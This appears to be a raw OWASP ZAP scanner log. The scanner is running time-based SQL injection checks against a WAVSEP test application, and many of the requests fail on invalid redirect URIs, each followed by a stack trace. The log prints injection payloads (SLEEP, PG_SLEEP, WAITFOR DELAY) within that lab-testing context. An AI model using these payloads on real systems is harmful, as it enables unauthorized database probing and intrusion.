org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))dxSk)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679272 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679273 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))TYRE)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))TYRE)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679274 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679274 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');(SELECT * FROM (SELECT(SLEEP(5)))KaJe)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');(SELECT * FROM (SELECT(SLEEP(5)))KaJe)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679275 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679275 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';(SELECT * FROM (SELECT(SLEEP(5)))Vwvl)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';(SELECT * FROM (SELECT(SLEEP(5)))Vwvl)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679277 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';(SELECT * FROM (SELECT(SLEEP(5)))zpXZ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';(SELECT * FROM (SELECT(SLEEP(5)))zpXZ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679277 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679278 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))thRT)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))thRT)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679278 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679280 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679281 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679282 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 